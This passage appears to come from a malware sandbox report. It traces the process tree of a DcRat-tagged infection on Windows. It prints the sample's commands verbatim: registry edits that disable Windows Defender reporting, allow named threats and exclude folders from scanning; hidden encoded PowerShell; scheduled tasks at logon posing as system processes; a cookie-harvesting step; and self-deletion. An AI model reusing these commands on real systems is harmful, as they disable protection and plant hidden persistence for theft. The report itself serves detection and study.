C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gneIVspRo" /SC once /ST 00:50:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gneIVspRo"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gneIVspRo"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe\" j6 /site_id 525403 /S" /V1 /F9⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe"C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe7⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 08⤵
-
C:\Users\Admin\Documents\ZcZKv3wUd95iiqEdR8N8GIp7.exe"C:\Users\Admin\Documents\ZcZKv3wUd95iiqEdR8N8GIp7.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exearnatic_7.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exeC:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_5.exearnatic_5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_4.exearnatic_4.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_3.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_3.exearnatic_3.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 6007⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_1.exearnatic_1.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3528 -s 10326⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1060 -ip 10601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3528 -ip 35281⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\PerfLogs\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\SysWOW64\sv-SE\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\runonce\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\comuid\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\dpnathlp\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "5RLR8rS_aMkp6xiTBY96V6aV" /sc ONLOGON /tr "'C:\Users\Admin\Documents\These\5RLR8rS_aMkp6xiTBY96V6aV.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\uefifces\ezokegez.exeC:\Windows\SysWOW64\uefifces\ezokegez.exe /d"C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 5162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4252 -ip 42521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1420 -ip 14201⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\docprop\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Documents and Settings\WaaSMedicAgent.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\unimdmat\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\WMADMOE\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ETuSLYkVQqOjTT_usPKsVG0_" /sc ONLOGON /tr "'C:\Users\Admin\Documents\Mh9GBYaC5IGIHnRPtOgGO9qd\ETuSLYkVQqOjTT_usPKsVG0_.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "arnatic_7" /sc ONLOGON /tr "'C:\Documents and Settings\arnatic_7.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\Microsoft.Uev.Office2013CustomActions\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\odt\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5044 -ip 50441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5004 -ip 50041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 4900 -ip 49001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5044 -ip 50441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5824 -ip 58241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4900 -ip 49001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5004 -ip 50041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1332 -ip 13321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1332 -ip 13321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5884 -ip 58841⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Users\Admin\AppData\Local\Temp\AF15.exeC:\Users\Admin\AppData\Local\Temp\AF15.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\AFC2.exeC:\Users\Admin\AppData\Local\Temp\AFC2.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\AFC2.exeC:\Users\Admin\AppData\Local\Temp\AFC2.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exeC:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe j6 /site_id 525403 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:323⤵
-
